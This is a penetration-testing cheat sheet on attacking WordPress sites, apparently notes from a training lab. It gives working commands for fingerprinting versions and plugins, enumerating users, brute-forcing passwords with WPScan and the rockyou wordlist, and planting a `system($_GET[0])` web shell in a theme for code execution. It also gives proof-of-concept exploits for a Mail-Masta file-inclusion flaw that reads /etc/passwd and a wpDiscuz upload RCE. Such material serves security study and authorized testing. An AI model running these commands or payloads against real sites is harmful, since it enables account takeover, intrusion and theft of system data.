# WordPress

<table><thead><tr><th width="178">User Role</th><th>Description</th></tr></thead><tbody><tr><td>Administrator</td><td>Full Privileges - This user role is an interesting target due to his capability of managing plugins</td></tr><tr><td>Editor</td><td>Can publish and manage any user's posts - This user role is an interesting target due to his capability of managing plugins</td></tr><tr><td>Author</td><td>Can publish and manage their posts</td></tr><tr><td>Contributor</td><td>Can write and manage their own post, but he cannot publish them</td></tr><tr><td>Subscriber</td><td>Can view posts and manage/modify their profile</td></tr></tbody></table>

Getting access to an administrator is usually sufficient to obtain code execution on the server.\
Editors and authors might have access to certain vulnerable plugins, which normal users don’t.

***

## **WordPress Discovery/Footprinting**

**Manual Identification:**

* Check if the `robots.txt` file contains any wordpress entry
* Check if `/wp-admin`, `/wp-content`, `xmlrpc.php` or wordpress-related artifacts exist.
* Search the WP version inside the page source code:\
  `curl example.com | grep '<meta name="generator"'`
* Search the WP version inside the `css` or `js` files:\
  `curl example.com | grep '?ver='`
* Find the version inside `readme.html` (only works for old ones)

Identification using WPScan:

* `wpscan --url example.com --enumerate --api-token TOKENVALUE`

Plugins Enumeration:

* `curl -s -X GET https://example.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2`
* You can also try enumerating whether a plugin is in use by navigating to the plugin's directory and checking whether the web application redirects to the complete folder (via a 3XX redirect)\
  `curl -I -X GET http://example.com/wp-content/plugins/mail-masta` <- misses the last `/`&#x20;
* If the application answers with 3XX redirect, the plugin exists. If it answers with a 404, it does not.

{% hint style="info" %}
This technique allows you to find installed plugins, which could be deactivated.
{% endhint %}

Themes Enumeration:

* `curl -s -X GET https://example.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2`

***

## **User Enumeration**

Some versions of WordPress logins allow enumerating usernames due to verbose error messages stating whether a username is right or not.&#x20;

Alternative methods are:

1. Use the `?author=` GET parameter to check whether the page redirects you to a valid user's page:\
   `curl -s -I http://example.com/?author=1`
2. Check usernames inside the `wp-json` `users` file:\
   `curl http://example.com/wp-json/wp/v2/users | jq`

After you found a valid username, you can use `wpscan` to bruteforce a valid user's password:\
`sudo wpscan --password-attack xmlrpc -t 20 -U admin, sfoffo -P /usr/share/wordlists/rockyou.txt --url https://example.com`

{% hint style="danger" %}
Some WordPress instances may lock-out a user after few invalid attempts&#x20;
{% endhint %}

***

## **Admin User - Remote Code Execution**

> An aministrator account may edit PHP code in order to gain RCE.\
> Note: when editing an active theme or plugin you may encounter errors. Deactivate them first.

**The steps are the following:**

* **Semi-automatically, using `msfconsole`**:\
  `use exploit/unix/webapp/wp_admin_shell_upload`
* **Manually, by modifying a theme:**
  1. Login as administrator.\
     Navigate to: appearance → side panel → theme editor → select a theme
  2. Add the following to the theme: `system($_GET[0]);`
  3. Use the following URL to gain RCE: `http://example.test/wp-content/themes/THEMENAME/FILEPHPNAME.PHP?0=id`

***

## **WordPress Known Vulnerable Plugins**

1. **`Mail-Masta` allows LFI by using the following PoC:** `curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd`
2. `wpDiscuz` allows RCE by using the following PoC:
   * [ExploitDB](https://www.exploit-db.com/exploits/49967): `python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1`
   * if it fails, use `cURL` to execute commands using the uploaded web shell: `curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id`